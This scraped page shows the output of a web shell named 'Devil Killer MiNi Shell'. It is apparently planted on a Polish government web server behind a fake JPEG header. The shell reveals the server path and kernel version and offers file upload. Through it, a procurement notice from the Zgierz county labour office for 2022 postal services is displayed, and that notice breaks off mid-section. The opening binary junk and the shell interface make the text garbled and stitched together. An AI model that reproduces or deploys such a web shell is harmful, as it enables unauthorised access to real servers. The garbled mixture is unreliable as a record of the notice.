JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211220/0032359101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi pocztowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy w Zgierzu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472286002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Barona 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 716 49 41</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">42 717 41 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pupzgierz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zgierz.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność na rzecz bezrobotnych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi pocztowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-54fb8087-6196-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00323591</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000962/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi pocztowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pupzgierz.bip.gov.pl/aktualne/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielnie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem: https://zgierz.praca.gov.pl/elektroniczna-skrzynka-podawcza oraz poczty elektronicznej: przetargi@pupzgierz.pl ( z wyjątkiem złożenia oferty).<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza do komunikacji&#34;.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu.<br/>5. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczenia o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, innych informacji, oświadczeń i dokumentów przekazywanych w postępowaniu przyjmuje się datę ich przekazania na ePUAP. Zamawiający dopuszcza możliwość składania dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń za pomocą poczty elektronicznej na adres e-mail: przetargi@pupzgierz.pl. <br/>8. Dokumenty elektroniczne, oświadczenia lub inne cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji”. <br/> 9. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiam określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/> rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415)<br/> 10. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu poczty elektronicznej, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.<br/> 11. W przypadku braku potwierdzenia otrzymania wiadomości przez Wykonawcę, Zamawiający domniema, iż pismo wysłane przez Zamawiającego na adres e-mail podany przez Wykonawcę zostało mu doręczone w sposób umożliwiający zapoznanie się Wykonawcy z treścią pisma. <br/> 12. W korespondencji związanej z niniejszym postępowaniem Zamawiający Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID postępowania na miniportalu).<br/> 13 Do kontaktu z Wykonawcami wyznaczona została Karolina Przepiórska-Tokarz, Wydział Zarządzania, Nadzoru i Administrowania Majątkiem, nr tel. 42 714-12-74, godz. pracy 7.30 – 15.30, e -mail: przetargi@pupzgierz.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Powiatowy Urząd Pracy w Zgierzu z siedzibą przy ulicy Barona 10, kod pocztowy 95-100 Zgierz. Inspektorem ochrony danych w Powiatowym Urzędzie Pracy w Zgierzu jest Pani Sylwia Skalska, kontakt <br/>e-mail: iod@pupzgierz.pl, tel.: (42) 714-12-83.<br/>Publiczne służby zatrudnienia, które tworzy m.in. Powiatowy Urząd Pracy w Zgierzu, przetwarzają dane osobowe osób fizycznych w celu realizacji zadań ustawowych, w tym weryfikacji uprawnień i danych, zapewnienia pomocy określonej w ustawie, prowadzenia postępowań kontrolnych, realizacji obowiązków sprawozdawczych<br/>i obowiązków w zakresie statystyki publicznej.<br/>Pani/Pana dane osobowe: <br/>• są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, tj. w celu realizacji ustawy z dnia 20 kwietnia 2004r. <br/>o promocji zatrudnienia i instytucjach rynku pracy, zwanej dalej ustawą oraz aktów wykonawczych do ww. ustawy, a także w związku z ustawą z dnia 11 września 2019r.. prawo zamówień publicznych, a następnie dla wypełnienia obowiązku archiwizacji dokumentów wynikającego z ustawy z dnia 14 lipca 1983r.o narodowym zasobie archiwalnym i archiwach; są przetwarzane zgodnie z ustawą z dnia 10 maja 2018r.o ochronie danych osobowych;<br/><br/>•mogą być przetwarzane w celu realizacji umowy, wykonania zadań realizowanych w interesie publicznym, do realizacji celów wynikających z prawnie uzasadnionych interesów administratora, takich jak zabezpieczenie dochodzenia roszczeń.<br/>Pani/Pana dane osobowe są przekazywane do: <br/>•rejestru centralnego w którym są one przetwarzane przez ministra właściwego do spraw pracy i udostępniane <br/>w trybie i na zasadach określonych w ustawie z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne innym podmiotom realizującym zadania publiczne na podstawie odrębnych przepisów. <br/>•podmiotów przetwarzających, z którymi Urząd zawarł umowy powierzenia, w szczególności do: •Spółki Akcyjnej SYGNITY •Spółki cywilnej INF-US •Banku Spółdzielczego w Zgierzu; •Firmy świadczącej usługi prawne dla Urzędu •Firmy świadczącej usługi niszczenia dokumentów.<br/>•wiadomości publicznej poprzez:<br/>1) zamieszczenie na stronie podmiotowej Biuletynu Informacji Publicznej Zamawiającego (https://bip.pupzgierz.pl);<br/>2) zamieszczenie w bazie konkurencyjności (https://bazakonkurencyjności.funduszeeuropejskie.gov.pl) <br/> –dotyczy zamówień o wartości szacunkowej przekraczającej 50.000,00 PLN netto, <br/> a poniżej 130.000,00 zł netto, finansowanych z Europejskiego Funduszu Społecznego;<br/>3) zamieszczenie w Biuletynie Zamówień Publicznych (https://bzp.uzp.gov.pl) – dotyczy zamówień o wartości<br/> równej lub przekraczającej kwotę 130.000,00 zł a mniejszej niż progi unijne określane obwieszczeniem Prezesa UZP w sprawie aktualnych progów unijnych.<br/><br/>dane mogą być przekazane do:<br/>•innych organów/osób upoważnionych na podstawie przepisów prawa • m.in. w trybie wnioskowym, <br/>np. do Państwowej Inspekcji Pracy, organów wymiaru sprawiedliwości (m.in. Sądów, Policji, Komorników Sądowych).<br/>Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego / organizacji międzynarodowej.Pani/Pana dane osobowe są przechowywane w rejestrze centralnym oraz w rejestrze Powiatowego Urzędu Pracy <br/>w Zgierzu przez okres 50 lat, licząc od końca roku kalendarzowego, w którym zakończono udzielanie pomocy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Do przetwarzania Pani/Pana danych osobowych dopuszczono wyłącznie osoby posiadające upoważnienie nadane przez administratora danych, które pisemnie zobowiązały się do zachowania ich w tajemnicy. Dane są przechowywane w sposób zapewniający poufność, integralność i dostępność oraz zabezpieczone w systemie informatycznym zgodnie z ustawą z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne i Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych oraz zgodnie z Polityką Zarządzania Bezpieczeństwem Informacji obowiązującą w Powiatowym Urzędzie Pracy w Zgierzu. Zgodnie z RODO przysługuje Panu/Pani prawo:<br/><br/>• dostępu do treści swoich danych oraz prawo ich sprostowania;<br/>• ograniczenia przetwarzania<br/>• usunięcia danych – w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się <br/> z obowiązku wynikającego z przepisów prawa lub w ramach sprawowania władzy publicznej;<br/>• wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych (na adres: ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy dotyczące ochrony danych osobowych;<br/>Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Odmowa podania danych osobowych jest równoznaczna z brakiem możliwości udziału w postępowaniu o zamówienie publiczne.Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany <br/> <br/> Wykonawca powinien wypełnić obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ.2712.3.2021.KPT</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 181089,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przedmiot zamówienia musi być realizowany przez podmiot posiadający wpis do rejestru operatorów pocztowych prowadzonego przez Urząd Komunikacji Elektronicznej.<br/>3.	Przez przesyłki listowe objęte przedmiotem niniejszego zamówienia Zamawiający rozumie przesyłki listowe w obrocie krajowym i zagranicznym o wadze do 2 000 g i rozmiarach określonych formatem S, M,L.<br/>1)	zwykłe ekonomiczne – przesyłki listowe nierejestrowane, które nie są przesyłkami najszybszej kategorii, <br/>2)	zwykłe priorytetowe - przesyłki listowe nierejestrowane będące przesyłkami najszybszej kategorii w obrocie krajowym i zagranicznym,<br/>3)	polecone nie będące przesyłkami najszybszej kategorii - przesyłki listowe rejestrowane, przemieszczane i doręczane w sposób zabezpieczający je przed utratą zawartości lub uszkodzeniem, <br/>4)	polecone priorytetowe - przesyłki rejestrowane, będące przesyłkami najszybszej kategorii, przemieszczane i doręczane w sposób zabezpieczający je przed utratą zawartości lub uszkodzeniem,<br/>5)	polecone ze zwrotnym potwierdzeniem odbioru – przesyłki listowe rejestrowane, przemieszczane i doręczane w sposób zabezpieczający je przed utratą zawartości lub uszkodzeniem, które nie są przesyłkami najszybszej kategorii i doręczane za zwrotnym potwierdzeniem odbioru,<br/>6)	polecone priorytetowe za potwierdzeniem odbioru – przesyłki rejestrowane, przemieszczane i doręczane w sposób zabezpieczający je przed utratą zawartości lub uszkodzeniem, będące przesyłkami najszybszej kategorii i doręczane za zwrotnym potwierdzenie odbioru. <br/>4.	Przez przesyłki rejestrowane Zamawiający rozumie, zgodnie z ustawą Prawo pocztowe <br/>przesyłkę pocztową przyjętą za pokwitowaniem przyjęcia i doręczaną za pokwitowaniem odbioru.<br/>5.	Przez zwrotne potwierdzenie odbioru Zamawiający rozumie uzyskanie przez Zamawiającego na jego żądanie dokumentu potwierdzającego odbiór przesyłki rejestrowanej na odpowiednio wypełnionym formularzu w postaci papierowej dołączonym do przesyłki, opatrzonym napisem „Potwierdzenie odbioru”. Zamawiający wymaga obsługi druków „Potwierdzenia odbioru” zarówno na drukach Wykonawcy, jak <br/>i na drukach Zamawiającego potwierdzających odbiór przesyłki na zasadach określonych w ustawie z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (tekst jedn. Dz. U. z 2021 r. poz.735 z późn. zm.) zwanej dalej Kpa.<br/>6.	Przesyłki listowe objęte przedmiotem niniejszego zamówienia obejmują przesyłki <br/>o następujących formatach:<br/>1)	Format S – przesyłki o wymiarach:<br/>- minimum : wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm<br/>- maksimum: żaden z wymiarów nie może przekroczyć: wysokości 20 mm, długości 230 mm, szerokości 160 mm.<br/>b) Format M – przesyłki o wymiarach:<br/>	- minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm.<br/> - maksimum: żaden z wymiarów nie może przekroczyć: wysokości 20 mm, długości 325 mm, szerokości 230 mm.<br/>c) Format L – przesyłki o wymiarach:<br/>	- minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm.<br/> - maksimum: suma długości, szerokości i wysokości 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.<br/> Wszystkie wymiary przyjmuje się z tolerancją +/- 2mm.<br/>7. Przez paczki pocztowe będące przedmiotem niniejszego zamówienia zamawiający rozumie przesyłkę rejestrowaną, niebędącą przesyłką listową, o masie do 10 000g , (zwykłe i priorytetowe) i wymiarach, z których żaden nie może przekroczyć 1500 mm albo które nie mogą przekroczyć 3000 mm dla sumy długości i największego obwodu mierzonego w innym kierunku niż długość. Minimum wymiarów strony adresowej: 90x140 mm.<br/>	1) Gabaryt A to paczka o wymiarach: <br/>- minimum – wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm.<br/>- maksimum – żaden z wymiarów nie może przekroczyć długości 600 mm, szerokości 500 mm, wysokości 300 mm.<br/>2) Gabaryt B to paczka o wymiarach:<br/> - minimum – jeżeli choć jeden z wymiarów przekracza długość 600 mm, lub szerokość <br/>500 mm, lub wysokość 300 mm.<br/> - maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość - 3000 mm przy czym największy wymiar nie może przekroczyć 1500 mm.<br/>Wykonawca musi zapewnić możliwość samodzielnego nadawania przez Zamawiającego wszystkich przesyłek objętych przedmiotem niniejszego zamówienia, w placówkach nadawczych wskazanych przez Wykonawcę, czynnych od poniedziałku do piątku, co najmniej przez 3 godziny każdego z tych dni, usytuowanych w miejscowościach objętych właściwością miejscową Zamawiającego, w których Zamawiający posiada siedzibę główną lub oddziały terenowe takie jak:<br/>1) Zgierz, ul Barona 10, siedziba główna Zamawiającego,<br/>2) Aleksandrów Łódzki – Punkt Informacyjno - Konsultacyjny, ul. Piotrkowska 4/6,<br/>3) Głowno, Punkt Informacyjno - Konsultacyjny, ul. Norblina 1,<br/>4) Ozorków, Punkt Informacyjno - Konsultacyjny ul. Kościelna 1.<br/>9.	Wykonawca musi jednocześnie dysponować placówkami przeznaczonymi do odbioru wszystkich przesyłek, objętych przedmiotem niniejszego zamówienia, w tym awizowanych, usytuowanych w miejscowościach powiatu zgierskiego i czynnych <br/>w dniach i godzinach tak jak w ust 8. <br/>Zamawiający dopuszcza możliwość usytuowania ww. placówek w miejscowościach innych niż wymienione w ust. 8 pkt 1) – 4) z zastrzeżeniem, że <br/>w takim przypadku odległość tych placówek od siedzib zamawiającego w tych miejscowościach nie może przekraczać odległości drogowej 3 km.<br/>Wykonawca musi również dysponować placówkami przeznaczonymi do odbioru wszystkich przesyłek, nadanych przez Zamawiającego, objętych przedmiotem niniejszego zamówienia, w tym awizowanych, na terenie Rzeczypospolitej Polskiej na terenie każdej gminy lub gminy sąsiedniej.<br/>Szczegółowy opis zawiera załącznik nr 5 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64112000-4 - Usługi pocztowe dotyczące listów</p> <p class="mb-0">64113000-1 - Usługi pocztowe dotyczące paczek</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Badania i oceny ofert dokona Komisja Przetargowa.<br/>2. Ocena dokonana będzie w oparciu o następujące kryteria oceny ofert: <br/> „Cena” – 60%<br/> „Możliwość śledzenia przesyłek rejestrowych” – 40% <br/>- na podstawie deklaracji wykonawcy zawartej w formularzu ofertowym <br/>Szczegóły w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Możliwość śledzenia przesyłek rejestrowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) 